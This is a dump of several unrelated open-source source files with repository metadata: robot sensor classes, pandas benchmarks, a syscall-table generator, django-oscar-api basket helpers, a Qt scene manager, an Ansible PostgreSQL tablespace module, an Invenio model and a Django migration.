return self._robot def on_reset(self, env): """A callback function for the reset event. Args: env: the environment who invokes this callback function. """ self._env = env self._observation_buffer.reset() self.on_new_observation() def on_step(self, env): """A callback function for the control step event. Args: env: the environment who invokes this callback function. """ pass def visualize(self): """Visualizes the sensor information.""" pass def on_new_observation(self): """A callback for each observation received. To be differentiated from on_step, which will be called only once per control step (i.e. env.step), this API will be called everytime in the substep/action repeat loop, when new observations are expected. Each derived sensor class should implement this API by implementing: my_obs = call env/robot api to get the observation self._observation_buffer.add(my_obs) """ timestamp, obs = self._get_original_observation() if self._enable_debug_visualization: self.visualize() self._observation_buffer.add(timestamp, obs) def on_terminate(self, env): """A callback function for the terminate event. Args: env: the environment who invokes this callback function. """ pass def _stack_space(self, space: Union[gym.spaces.Box, gym.spaces.Dict], dtype: np.dtype = None) -> Any: """Returns stacked version of observation space. This stacks a gym.spaces.Box or gym.spaces.Dict action space based on the length of the sensor latency and the axis for stacking specified in the sensor. A gym.spaces.Box is just stacked, but a gym.spaces.Dict is recursively stacked, preserving its dictionary structure while stacking any gym.spaces.Box contained within. For example, the input action space: gym.spaces.Dict({ 'space_1': gym.spaces.Box(low=0, high=10, shape=(1,)), 'space_2': gym.spaces.Dict({ 'space_3': gym.spaces.Box(low=0, high=10, shape=(2,)), }), })) would be converted to the following if sensor latency was [0, 1]: gym.spaces.Dict({ 'space_1': gym.spaces.Box(low=0, high=10, shape=(1, 2)), 'space_2': gym.spaces.Dict({ 'space_3': gym.spaces.Box(low=0, high=10, shape=(2, 2)), }), })) Args: space: A gym.spaces.Dict or gym.spaces.Box to be stacked. dtype: Datatype for the stacking. Returns: stacked_space: A stacked version of the action space. """ if self._single_latency: return space # Allow sensors such as last_action_sensor to override the dtype. dtype = dtype or space.dtype if isinstance(space, gym.spaces.Box): return self._stack_space_box(space, dtype) elif isinstance(space, gym.spaces.Dict): return self._stack_space_dict(space, dtype) else: raise ValueError(f"Space {space} is an unsupported type.") def _stack_space_box(self, space: gym.spaces.Box, dtype: np.dtype) -> gym.spaces.Box: """Returns stacked version of a box observation space. This stacks a gym.spaces.Box action space based on the length of the sensor latency and the axis for stacking specified in the sensor. Args: space: A gym.spaces.Box to be stacked. dtype: Datatype for the stacking Returns: stacked_space: A stacked version of the gym.spaces.Box action space. """ length = len(self._sensor_latency) stacked_space = gym.spaces.Box( low=np.repeat( np.expand_dims(space.low, axis=self._axis), length, axis=self._axis), high=np.repeat( np.expand_dims(space.high, axis=self._axis), length, axis=self._axis), dtype=dtype) return stacked_space def _stack_space_dict(self, space: gym.spaces.Dict, dtype: np.dtype) -> gym.spaces.Dict: """Returns stacked version of a dict observation space. This stacks a gym.spaces.Dict action space based on the length of the sensor latency and the recursive structure of the gym.spaces.Dict itself. Args: space: A gym.spaces.Dict to be stacked. dtype: Datatype for the stacking. Returns: stacked_space: A stacked version of the dictionary action space. """ return gym.spaces.Dict([ (k, self._stack_space(v, dtype)) for k, v in space.spaces.items() ]) def _encode_obs_dict_keys(self, obs_dict): """Encodes sub obs keys of observation dict or observsation space dict.""" return {encode_sub_obs_key(self, k): v for k, v in obs_dict.items()} class BoxSpaceSensor(Sensor): """A prototype class of sensors with Box shapes.""" def __init__(self, name: Text, shape: Tuple[int, ...], lower_bound: _FloatOrArray = -np.pi, upper_bound: _FloatOrArray = np.pi, dtype=np.float64) -> None: """Constructs a box type sensor. Will be deprecated (b/150818246) once we switch to gym spaces. Args: name: the name of the sensor shape: the shape of the sensor values lower_bound: the lower_bound of sensor value, in float or np.array. upper_bound: the upper_bound of sensor value, in float or np.array. dtype: data type of sensor value """ super(BoxSpaceSensor, self).__init__( name=name, sensor_latency=0.0, interpolator_fn=newer_obs_blender) self._shape = shape self._dtype = dtype if isinstance(lower_bound, float): self._lower_bound = np.full(shape, lower_bound, dtype=dtype) else: self._lower_bound = np.array(lower_bound) if isinstance(upper_bound, float): self._upper_bound = np.full(shape, upper_bound, dtype=dtype) else: self._upper_bound = np.array(upper_bound) def set_robot(self, robot): # Since all old robot class do not inherit from RobotBase, we can enforce # the checking here. if isinstance(robot, robot_base.RobotBase): raise ValueError( "Cannot use new robot interface RobotBase with old sensor calss.") self._robot = robot def get_shape(self) -> Tuple[int, ...]: return self._shape def get_dimension(self) -> int: return len(self._shape) def get_dtype(self): return self._dtype def get_observation_datatype(self) -> _DataTypeList: """Returns box-shape data type.""" return [(self._name, self._dtype, self._shape)] def get_lower_bound(self) -> _ARRAY: """Returns the computed lower bound.""" return self._lower_bound def get_upper_bound(self) -> _ARRAY: """Returns the computed upper bound.""" return self._upper_bound def get_observation(self) -> np.ndarray: return np.asarray(self._get_observation(), dtype=self._dtype) def _get_original_observation(self) -> Tuple[float, Any]: # Maintains compatibility with the new sensor classes.""" raise NotImplementedError("Not implemented for this class.") def on_new_observation(self): # Maintains compatibility with the new sensor classes.""" pass def encode_sub_obs_key(s: Sensor, sub_obs_name: Optional[Text]): """Returns a sub observation key for use in observation dictionary.""" if sub_obs_name == MAIN_OBS_KEY: return s.get_name() else: return f"{s.get_name()}/{sub_obs_name}"
agpl-3.0
3,822,107,709,921,278,000
33.481153
82
0.663301
false
3.854027
false
false
false
winklerand/pandas
asv_bench/benchmarks/replace.py
1
2171
from .pandas_vb_common import * class replace_fillna(object): goal_time = 0.2 def setup(self): self.N = 1000000 try: self.rng = date_range('1/1/2000', periods=self.N, freq='min') except NameError: self.rng = DatetimeIndex('1/1/2000', periods=self.N, offset=datetools.Minute()) self.date_range = DateRange self.ts = Series(np.random.randn(self.N), index=self.rng) def time_replace_fillna(self): self.ts.fillna(0.0, inplace=True) class replace_large_dict(object): goal_time = 0.2 def setup(self): self.n = (10 ** 6) self.start_value = (10 ** 5) self.to_rep = {i: self.start_value + i for i in range(self.n)} self.s = Series(np.random.randint(self.n, size=(10 ** 3))) def time_replace_large_dict(self): self.s.replace(self.to_rep, inplace=True) class replace_convert(object): goal_time = 0.5 def setup(self): self.n = (10 ** 3) self.to_ts = {i: pd.Timestamp(i) for i in range(self.n)} self.to_td = {i: pd.Timedelta(i) for i in range(self.n)} self.s = Series(np.random.randint(self.n, size=(10 ** 3))) self.df = DataFrame({'A': np.random.randint(self.n, size=(10 ** 3)), 'B': np.random.randint(self.n, size=(10 ** 3))}) def time_replace_series_timestamp(self): self.s.replace(self.to_ts) def time_replace_series_timedelta(self): self.s.replace(self.to_td) def time_replace_frame_timestamp(self): self.df.replace(self.to_ts) def time_replace_frame_timedelta(self): self.df.replace(self.to_td) class replace_replacena(object): goal_time = 0.2 def setup(self): self.N = 1000000 try: self.rng = date_range('1/1/2000', periods=self.N, freq='min') except NameError: self.rng = DatetimeIndex('1/1/2000', periods=self.N, offset=datetools.Minute()) self.date_range = DateRange self.ts = Series(np.random.randn(self.N), index=self.rng) def time_replace_replacena(self): self.ts.replace(np.nan, 0.0, inplace=True)
bsd-3-clause
1,624,599,673,181,421,300
30.014286
91
0.587748
false
3.132756
false
false
false
sebastiaangroot/kmaldetect
tools/build/gen_syscall_table.py
1
1860
""" A simple python script to generate a sh table that takes the name of a syscall as input and translates it to the number corrosponding with that syscall. This function is used in the sig_gen.sh script, used to generate an application signature for detection in kmaldetect. Keep in mind that the '\n' characters used here will be translated to your OS's newline convention. """ import sys import getopt def gen_function(content, f): f.write('function get_syscall_index\n') f.write('{\n') f.write('\tcase $1 in\n') for line in content: if line.startswith('#define __NR_') and line.find('stub_') == -1: if line[9:].find('\t') != -1: num = line[line.find('\t', line.find('__NR_')):].lstrip('\t').strip() #num = the characters after the tab / whitespace characters, after the _NR__ name = line[line.find('__NR_') + 5:].split('\t')[0] #name = the characters after the _NR__ but before the tab / whitespace characters elif line[9:].find(' ') != -1: num = line[line.find(' ', line.find('__NR_')):].lstrip(' ').strip() name = line[line.find('__NR_') + 5:].split(' ')[0] else: #There has to be a space or tab after the #define _NR__xxx. This was not the case, so call continue on the for loop continue f.write('\t\t\'' + name + '\')\n') f.write('\t\t\treturn ' + num + '\n') f.write('\t\t\t;;\n') f.write('\tesac\n') f.write('}\n') infile = '' # path to the unistd_xx.h header outfile = '' # path to the outfile, which will be filled with a .sh function for the use in sig_gen.sh content = '' # content of infile opts, args = getopt.getopt(sys.argv[1:], 'i:o:', ['infile=', 'outfile=']) for o, a in opts: if o in ('--infile', '-i'): infile = a elif o in ('--outfile', '-o'): outfile = a with open(infile, 'r') as f: content = f.readlines() f = open(outfile, 'a') gen_function(content, f) f.flush() f.close()
gpl-2.0
9,037,986,725,254,694,000
38.595745
152
0.634409
false
3.059211
false
false
false
lijoantony/django-oscar-api
oscarapi/basket/operations.py
1
3871
"This module contains operation on baskets and lines" from django.conf import settings from oscar.core.loading import get_model, get_class from oscar.core.utils import get_default_currency from oscar.core.prices import Price __all__ = ( 'apply_offers', 'assign_basket_strategy', 'prepare_basket', 'get_basket', 'get_basket_id_from_session', 'get_anonymous_basket', 'get_user_basket', 'store_basket_in_session', 'request_contains_basket', 'flush_and_delete_basket', 'request_contains_line', 'save_line_with_default_currency', ) Basket = get_model('basket', 'Basket') Applicator = get_class('offer.utils', 'Applicator') Selector = None def apply_offers(request, basket): "Apply offers and discounts to cart" if not basket.is_empty: Applicator().apply(request, basket) def assign_basket_strategy(basket, request): # fixes too early import of Selector # TODO: check if this is still true, now the basket models nolonger # require this module to be loaded. global Selector if hasattr(request, 'strategy'): basket.strategy = request.strategy else: # in management commands, the request might not be available. if Selector is None: Selector = get_class('partner.strategy', 'Selector') basket.strategy = Selector().strategy( request=request, user=request.user) apply_offers(request, basket) return basket def prepare_basket(basket, request): assign_basket_strategy(basket, request) store_basket_in_session(basket, request.session) return basket def get_basket(request, prepare=True): "Get basket from the request." if request.user.is_authenticated(): basket = get_user_basket(request.user) else: basket = get_anonymous_basket(request) if basket is None: basket = Basket.objects.create() basket.save() return prepare_basket(basket, request) if prepare else basket def get_basket_id_from_session(request): return request.session.get(settings.OSCAR_BASKET_COOKIE_OPEN) def editable_baskets(): return Basket.objects.filter(status__in=["Open", "Saved"]) def get_anonymous_basket(request): "Get basket from session." basket_id = get_basket_id_from_session(request) try: basket = editable_baskets().get(pk=basket_id) except Basket.DoesNotExist: basket = None return basket def get_user_basket(user): "get basket for a user." try: basket, __ = editable_baskets().get_or_create(owner=user) except Basket.MultipleObjectsReturned: # Not sure quite how we end up here with multiple baskets. # We merge them and create a fresh one old_baskets = list(editable_baskets().filter(owner=user)) basket = old_baskets[0] for other_basket in old_baskets[1:]: basket.merge(other_basket, add_quantities=False) return basket def store_basket_in_session(basket, session): session[settings.OSCAR_BASKET_COOKIE_OPEN] = basket.pk session.save() def request_contains_basket(request, basket): if basket.can_be_edited: if request.user.is_authenticated(): return request.user == basket.owner return get_basket_id_from_session(request) == basket.pk return False def flush_and_delete_basket(basket, using=None): "Delete basket and all lines" basket.flush() basket.delete(using) def request_contains_line(request, line): basket = get_basket(request, prepare=False) if basket and basket.pk == line.basket.pk: return request_contains_basket(request, basket) return False def save_line_with_default_currency(line, *args, **kwargs): if not line.price_currency: line.price_currency = get_default_currency() return line.save(*args, **kwargs)
bsd-3-clause
7,321,325,571,453,484,000
27.463235
72
0.675794
false
3.722115
false
false
false
mtils/ems
ems/qt/graphics/scene_manager.py
1
7140
from ems.typehint import accepts from ems.qt.event_hook_proxy import SignalEventHookProxy from ems.qt import QtWidgets, QtGui, QtCore, QtPrintSupport from ems.qt.graphics.graphics_scene import GraphicsScene, BackgroundCorrector from ems.qt.graphics.graphics_widget import GraphicsWidget from ems.qt.graphics.storage.interfaces import SceneStorageManager from ems.qt.graphics.tool import GraphicsTool from ems.qt.graphics.tool import GraphicsToolDispatcher from ems.qt.graphics.text_tool import TextTool from ems.qt.graphics.pixmap_tool import PixmapTool from ems.qt.graphics.interfaces import Finalizer from ems.qt.graphics.page_item import PageItemHider, PageItem Qt = QtCore.Qt QObject = QtCore.QObject QRectF = QtCore.QRectF pyqtProperty = QtCore.pyqtProperty pyqtSlot = QtCore.pyqtSlot QWidget = QtWidgets.QWidget QVBoxLayout = QtWidgets.QVBoxLayout QToolBar = QtWidgets.QToolBar QSlider = QtWidgets.QSlider QAction = QtWidgets.QAction QKeySequence = QtGui.QKeySequence QPrintPreviewDialog = QtPrintSupport.QPrintPreviewDialog QPainter = QtGui.QPainter class SceneManager(QObject): def __init__(self, parent=None, storageManager=None): super(SceneManager, self).__init__(parent) self._scene = None self._widget = None self._tools = None self._storageManager = None self._importStorageManager = None self._loadAction = None self._saveAction = None self._importAction = None self._exportAction = None self._actions = [] self._finalizers = [BackgroundCorrector(), PageItemHider()] if storageManager: self.setStorageManager(storageManager) def actions(self): if not self._actions: self._populateActions() return self._actions def getScene(self): if not self._scene: self._scene = GraphicsScene() self._scene.deleteRequested.connect(self.deleteIfWanted) return self._scene scene = pyqtProperty(GraphicsScene, getScene) def getWidget(self): if not self._widget: self._widget = GraphicsWidget(scene=self.scene, tools=self.tools) self._addActionsToWidget(self._widget) self._widget.printPreviewRequested.connect(self.showPrintPreviewDialog) return self._widget widget = pyqtProperty(GraphicsWidget, getWidget) def getTools(self): if not self._tools: self._tools = self._createTools() return self._tools tools = pyqtProperty(GraphicsTool, getTools) def load(self, *args): if self._storageManager: return self._storageManager.load() def save(self, *args): if self._storageManager: return self._storageManager.save() def importScene(self, *args): if self._importStorageManager: return self._importStorageManager.load() def exportScene(self, *args): if self._importStorageManager: return self._importStorageManager.save() def getStorageManager(self): return self._storageManager @pyqtSlot(SceneStorageManager) def setStorageManager(self, storageManager): self._storageManager = storageManager self._storageManager.setScene(self.scene) self._storageManager.setTools(self.tools) storageManager = pyqtProperty(SceneStorageManager, getStorageManager, setStorageManager) def getImportStorageManager(self): return self._importStorageManager def setImportStorageManager(self, storageManager): self._importStorageManager = storageManager self._importStorageManager.setScene(self.scene) self._importStorageManager.setTools(self.tools) importStorageManager = pyqtProperty(SceneStorageManager, getImportStorageManager, setImportStorageManager) @property def loadAction(self): if self._loadAction: return self._loadAction self._loadAction = QAction('Load', self.getWidget(), shortcut = QKeySequence.Open) self._loadAction.triggered.connect(self.load) return self._loadAction @property def saveAction(self): if self._saveAction: return self._saveAction self._saveAction = QAction('Save', self.getWidget(), shortcut = QKeySequence.Save) self._saveAction.triggered.connect(self.save) return self._saveAction @property def importAction(self): if self._importAction: return self._importAction self._importAction = QAction('Import', self.getWidget()) self._importAction.triggered.connect(self.importScene) return self._importAction @property def exportAction(self): if self._exportAction: return self._exportAction self._exportAction = QAction('Export', self.getWidget()) self._exportAction.triggered.connect(self.exportScene) return self._exportAction def printScene(self, printer, painter=None): painter = painter if isinstance(painter, QPainter) else QPainter(printer) for finalizer in self._finalizers: finalizer.toFinalized(self.scene) pageItem = self._findPageItem() if pageItem: self.scene.render(painter, QRectF(), pageItem.boundingRect()) else: self.scene.render(painter) for finalizer in self._finalizers: finalizer.toEditable(self.scene) def showPrintPreviewDialog(self): margin = 30 parent = self.getWidget() self.printPrvDlg = QPrintPreviewDialog(parent) self.printPrvDlg.setWindowTitle(u'Druckvorschau') self.printPrvDlg.paintRequested.connect(self.printScene) self.printPrvDlg.resize(parent.width()-margin, parent.height()-margin) self.printPrvDlg.show() def deleteIfWanted(self): items = self.scene.selectedItems() if not len(items): return for item in items: self.scene.removeItem(item) @accepts(Finalizer) def addFinalizer(self, finalizer): self._finalizers.append(finalizer) def hasFinalizer(self, finalizer): return finalizer in self._finalizers def finalizer(self, cls): for finalizer in self._finalizers: if isinstance(finalizer, cls): return finalizer def _createTools(self): tools = GraphicsToolDispatcher(self) tools.setScene(self.scene) textTool = TextTool() tools.addTool(textTool) pixmapTool = PixmapTool() tools.addTool(pixmapTool) return tools def _populateActions(self): if self._actions: return self._actions.append(self.loadAction) self._actions.append(self.saveAction) self._actions.append(self.importAction) self._actions.append(self.exportAction) def _addActionsToWidget(self, widget): for action in self.actions(): widget.addAction(action) def _findPageItem(self): for item in self.scene.items(): if isinstance(item, PageItem): return item
mit
2,377,236,452,932,278,300
32.683962
110
0.67605
false
4.170561
false
false
false
pgmillon/ansible
lib/ansible/modules/database/postgresql/postgresql_tablespace.py
1
16280
#!/usr/bin/python # -*- coding: utf-8 -*- # Copyright: (c) 2017, Flavien Chantelot (@Dorn-) # Copyright: (c) 2018, Antoine Levy-Lambert (@antoinell) # Copyright: (c) 2019, Andrew Klychkov (@Andersson007) <aaklychkov@mail.ru> # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import (absolute_import, division, print_function) __metaclass__ = type ANSIBLE_METADATA = { 'metadata_version': '1.1', 'supported_by': 'community', 'status': ['preview'] } DOCUMENTATION = r''' --- module: postgresql_tablespace short_description: Add or remove PostgreSQL tablespaces from remote hosts description: - Adds or removes PostgreSQL tablespaces from remote hosts U(https://www.postgresql.org/docs/current/sql-createtablespace.html), U(https://www.postgresql.org/docs/current/manage-ag-tablespaces.html). version_added: '2.8' options: tablespace: description: - Name of the tablespace to add or remove. required: true type: str aliases: - name location: description: - Path to the tablespace directory in the file system. - Ensure that the location exists and has right privileges. type: path aliases: - path state: description: - Tablespace state. - I(state=present) implies the tablespace must be created if it doesn't exist. - I(state=absent) implies the tablespace must be removed if present. I(state=absent) is mutually exclusive with I(location), I(owner), i(set). - See the Notes section for information about check mode restrictions. type: str default: present choices: [ absent, present ] owner: description: - Name of the role to set as an owner of the tablespace. - If this option is not specified, the tablespace owner is a role that creates the tablespace. type: str set: description: - Dict of tablespace options to set. Supported from PostgreSQL 9.0. - For more information see U(https://www.postgresql.org/docs/current/sql-createtablespace.html). - When reset is passed as an option's value, if the option was set previously, it will be removed U(https://www.postgresql.org/docs/current/sql-altertablespace.html). type: dict rename_to: description: - New name of the tablespace. - The new name cannot begin with pg_, as such names are reserved for system tablespaces. session_role: description: - Switch to session_role after connecting. The specified session_role must be a role that the current login_user is a member of. - Permissions checking for SQL commands is carried out as though the session_role were the one that had logged in originally. type: str db: description: - Name of database to connect to and run queries against. type: str aliases: - login_db notes: - I(state=absent) and I(state=present) (the second one if the tablespace doesn't exist) do not support check mode because the corresponding PostgreSQL DROP and CREATE TABLESPACE commands can not be run inside the transaction block. author: - Flavien Chantelot (@Dorn-) - Antoine Levy-Lambert (@antoinell) - Andrew Klychkov (@Andersson007) extends_documentation_fragment: postgres ''' EXAMPLES = r''' - name: Create a new tablespace called acme and set bob as an its owner postgresql_tablespace: name: acme owner: bob location: /data/foo - name: Create a new tablespace called bar with tablespace options postgresql_tablespace: name: bar set: random_page_cost: 1 seq_page_cost: 1 - name: Reset random_page_cost option postgresql_tablespace: name: bar set: random_page_cost: reset - name: Rename the tablespace from bar to pcie_ssd postgresql_tablespace: name: bar rename_to: pcie_ssd - name: Drop tablespace called bloat postgresql_tablespace: name: bloat state: absent ''' RETURN = r''' queries: description: List of queries that was tried to be executed. returned: always type: str sample: [ "CREATE TABLESPACE bar LOCATION '/incredible/ssd'" ] tablespace: description: Tablespace name. returned: always type: str sample: 'ssd' owner: description: Tablespace owner. returned: always type: str sample: 'Bob' options: description: Tablespace options. returned: always type: dict sample: { 'random_page_cost': 1, 'seq_page_cost': 1 } location: description: Path to the tablespace in the file system. returned: always type: str sample: '/incredible/fast/ssd' newname: description: New tablespace name returned: if existent type: str sample: new_ssd state: description: Tablespace state at the end of execution. returned: always type: str sample: 'present' ''' try: from psycopg2 import __version__ as PSYCOPG2_VERSION from psycopg2.extras import DictCursor from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT as AUTOCOMMIT from psycopg2.extensions import ISOLATION_LEVEL_READ_COMMITTED as READ_COMMITTED except ImportError: # psycopg2 is checked by connect_to_db() # from ansible.module_utils.postgres pass from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.database import pg_quote_identifier from ansible.module_utils.postgres import ( connect_to_db, exec_sql, get_conn_params, postgres_common_argument_spec, ) class PgTablespace(object): """Class for working with PostgreSQL tablespaces. Args: module (AnsibleModule) -- object of AnsibleModule class cursor (cursor) -- cursor object of psycopg2 library name (str) -- name of the tablespace Attrs: module (AnsibleModule) -- object of AnsibleModule class cursor (cursor) -- cursor object of psycopg2 library name (str) -- name of the tablespace exists (bool) -- flag the tablespace exists in the DB or not owner (str) -- tablespace owner location (str) -- path to the tablespace directory in the file system executed_queries (list) -- list of executed queries new_name (str) -- new name for the tablespace opt_not_supported (bool) -- flag indicates a tablespace option is supported or not """ def __init__(self, module, cursor, name): self.module = module self.cursor = cursor self.name = name self.exists = False self.owner = '' self.settings = {} self.location = '' self.executed_queries = [] self.new_name = '' self.opt_not_supported = False # Collect info: self.get_info() def get_info(self): """Get tablespace information.""" # Check that spcoptions exists: opt = exec_sql(self, "SELECT 1 FROM information_schema.columns " "WHERE table_name = 'pg_tablespace' " "AND column_name = 'spcoptions'", add_to_executed=False) # For 9.1 version and earlier: location = exec_sql(self, "SELECT 1 FROM information_schema.columns " "WHERE table_name = 'pg_tablespace' " "AND column_name = 'spclocation'", add_to_executed=False) if location: location = 'spclocation' else: location = 'pg_tablespace_location(t.oid)' if not opt: self.opt_not_supported = True query = ("SELECT r.rolname, (SELECT Null), %s " "FROM pg_catalog.pg_tablespace AS t " "JOIN pg_catalog.pg_roles AS r " "ON t.spcowner = r.oid " "WHERE t.spcname = '%s'" % (location, self.name)) else: query = ("SELECT r.rolname, t.spcoptions, %s " "FROM pg_catalog.pg_tablespace AS t " "JOIN pg_catalog.pg_roles AS r " "ON t.spcowner = r.oid " "WHERE t.spcname = '%s'" % (location, self.name)) res = exec_sql(self, query, add_to_executed=False) if not res: self.exists = False return False if res[0][0]: self.exists = True self.owner = res[0][0] if res[0][1]: # Options exist: for i in res[0][1]: i = i.split('=') self.settings[i[0]] = i[1] if res[0][2]: # Location exists: self.location = res[0][2] def create(self, location): """Create tablespace. Return True if success, otherwise, return False. args: location (str) -- tablespace directory path in the FS """ query = ("CREATE TABLESPACE %s LOCATION '%s'" % (pg_quote_identifier(self.name, 'database'), location)) return exec_sql(self, query, ddl=True) def drop(self): """Drop tablespace. Return True if success, otherwise, return False. """ return exec_sql(self, "DROP TABLESPACE %s" % pg_quote_identifier(self.name, 'database'), ddl=True) def set_owner(self, new_owner): """Set tablespace owner. Return True if success, otherwise, return False. args: new_owner (str) -- name of a new owner for the tablespace" """ if new_owner == self.owner: return False query = "ALTER TABLESPACE %s OWNER TO %s" % (pg_quote_identifier(self.name, 'database'), new_owner) return exec_sql(self, query, ddl=True) def rename(self, newname): """Rename tablespace. Return True if success, otherwise, return False. args: newname (str) -- new name for the tablespace" """ query = "ALTER TABLESPACE %s RENAME TO %s" % (pg_quote_identifier(self.name, 'database'), newname) self.new_name = newname return exec_sql(self, query, ddl=True) def set_settings(self, new_settings): """Set tablespace settings (options). If some setting has been changed, set changed = True. After all settings list is handling, return changed. args: new_settings (list) -- list of new settings """ # settings must be a dict {'key': 'value'} if self.opt_not_supported: return False changed = False # Apply new settings: for i in new_settings: if new_settings[i] == 'reset': if i in self.settings: changed = self.__reset_setting(i) self.settings[i] = None elif (i not in self.settings) or (str(new_settings[i]) != self.settings[i]): changed = self.__set_setting("%s = '%s'" % (i, new_settings[i])) return changed def __reset_setting(self, setting): """Reset tablespace setting. Return True if success, otherwise, return False. args: setting (str) -- string in format "setting_name = 'setting_value'" """ query = "ALTER TABLESPACE %s RESET (%s)" % (pg_quote_identifier(self.name, 'database'), setting) return exec_sql(self, query, ddl=True) def __set_setting(self, setting): """Set tablespace setting. Return True if success, otherwise, return False. args: setting (str) -- string in format "setting_name = 'setting_value'" """ query = "ALTER TABLESPACE %s SET (%s)" % (pg_quote_identifier(self.name, 'database'), setting) return exec_sql(self, query, ddl=True) # =========================================== # Module execution. # def main(): argument_spec = postgres_common_argument_spec() argument_spec.update( tablespace=dict(type='str', aliases=['name']), state=dict(type='str', default="present", choices=["absent", "present"]), location=dict(type='path', aliases=['path']), owner=dict(type='str'), set=dict(type='dict'), rename_to=dict(type='str'), db=dict(type='str', aliases=['login_db']), session_role=dict(type='str'), ) module = AnsibleModule( argument_spec=argument_spec, mutually_exclusive=(('positional_args', 'named_args'),), supports_check_mode=True, ) tablespace = module.params["tablespace"] state = module.params["state"] location = module.params["location"] owner = module.params["owner"] rename_to = module.params["rename_to"] settings = module.params["set"] if state == 'absent' and (location or owner or rename_to or settings): module.fail_json(msg="state=absent is mutually exclusive location, " "owner, rename_to, and set") conn_params = get_conn_params(module, module.params) db_connection = connect_to_db(module, conn_params, autocommit=True) cursor = db_connection.cursor(cursor_factory=DictCursor) # Change autocommit to False if check_mode: if module.check_mode: if PSYCOPG2_VERSION >= '2.4.2': db_connection.set_session(autocommit=False) else: db_connection.set_isolation_level(READ_COMMITTED) # Set defaults: autocommit = False changed = False ############## # Create PgTablespace object and do main job: tblspace = PgTablespace(module, cursor, tablespace) # If tablespace exists with different location, exit: if tblspace.exists and location and location != tblspace.location: module.fail_json(msg="Tablespace '%s' exists with different location '%s'" % (tblspace.name, tblspace.location)) # Create new tablespace: if not tblspace.exists and state == 'present': if rename_to: module.fail_json(msg="Tablespace %s does not exist, nothing to rename" % tablespace) if not location: module.fail_json(msg="'location' parameter must be passed with " "state=present if the tablespace doesn't exist") # Because CREATE TABLESPACE can not be run inside the transaction block: autocommit = True if PSYCOPG2_VERSION >= '2.4.2': db_connection.set_session(autocommit=True) else: db_connection.set_isolation_level(AUTOCOMMIT) changed = tblspace.create(location) # Drop non-existing tablespace: elif not tblspace.exists and state == 'absent': # Nothing to do: module.fail_json(msg="Tries to drop nonexistent tablespace '%s'" % tblspace.name) # Drop existing tablespace: elif tblspace.exists and state == 'absent': # Because DROP TABLESPACE can not be run inside the transaction block: autocommit = True if PSYCOPG2_VERSION >= '2.4.2': db_connection.set_session(autocommit=True) else: db_connection.set_isolation_level(AUTOCOMMIT) changed = tblspace.drop() # Rename tablespace: elif tblspace.exists and rename_to: if tblspace.name != rename_to: changed = tblspace.rename(rename_to) if state == 'present': # Refresh information: tblspace.get_info() # Change owner and settings: if state == 'present' and tblspace.exists: if owner: changed = tblspace.set_owner(owner) if settings: changed = tblspace.set_settings(settings) tblspace.get_info() # Rollback if it's possible and check_mode: if not autocommit: if module.check_mode: db_connection.rollback() else: db_connection.commit() cursor.close() db_connection.close() # Make return values: kw = dict( changed=changed, state='present', tablespace=tblspace.name, owner=tblspace.owner, queries=tblspace.executed_queries, options=tblspace.settings, location=tblspace.location, ) if state == 'present': kw['state'] = 'present' if tblspace.new_name: kw['newname'] = tblspace.new_name elif state == 'absent': kw['state'] = 'absent' module.exit_json(**kw) if __name__ == '__main__': main()
gpl-3.0
-1,845,519,248,354,585,000
31.047244
120
0.615602
false
3.92952
false
false
false
inspirehep/invenio-formatter
invenio_formatter/models.py
1
1670
# -*- coding: utf-8 -*- # # This file is part of Invenio. # Copyright (C) 2013, 2015 CERN. # # Invenio is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License as # published by the Free Software Foundation; either version 2 of the # License, or (at your option) any later version. # # Invenio is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Invenio; if not, write to the Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. """Database cache for formatter.""" from invenio_ext.sqlalchemy import db class Bibfmt(db.Model): """Represent a Bibfmt record.""" __tablename__ = 'bibfmt' id_bibrec = db.Column( db.MediumInteger(8, unsigned=True), nullable=False, server_default='0', primary_key=True, autoincrement=False) format = db.Column( db.String(10), nullable=False, server_default='', primary_key=True, index=True) kind = db.Column( db.String(10), nullable=False, server_default='', index=True ) last_updated = db.Column( db.DateTime, nullable=False, server_default='1900-01-01 00:00:00', index=True) value = db.Column(db.iLargeBinary) needs_2nd_pass = db.Column(db.TinyInteger(1), server_default='0') __all__ = ('Bibfmt', )
gpl-2.0
-1,471,349,621,209,438,200
26.377049
74
0.651497
false
3.8041
false
false
false
Polytechnique-org/xorgauth
xorgauth/accounts/migrations/0012_make_user_names_blank.py
1
1028
# -*- coding: utf-8 -*- # Generated by Django 1.11.9 on 2018-01-04 13:41 from __future__ import unicode_literals from django.db import migrations, models import xorgauth.utils.fields class Migration(migrations.Migration): dependencies = [ ('accounts', '0011_make_user_ids_blank'), ] operations = [ migrations.AlterField( model_name='user', name='firstname', field=xorgauth.utils.fields.UnboundedCharField(blank=True, null=True, verbose_name='first name'), ), migrations.AlterField( model_name='user', name='lastname', field=xorgauth.utils.fields.UnboundedCharField(blank=True, null=True, verbose_name='last name'), ), migrations.AlterField( model_name='user', name='sex', field=models.CharField(blank=True, choices=[('male', 'Male'), ('female', 'Female')], max_length=6, null=True, verbose_name='sex'), ), ]
agpl-3.0
2,887,847,014,832,465,000
31.125
110
0.577821
false
4.063241
false
false
false
Souloist/Audio-Effects
Effects/Amplitude_Modulation/AM_example.py
1
1911
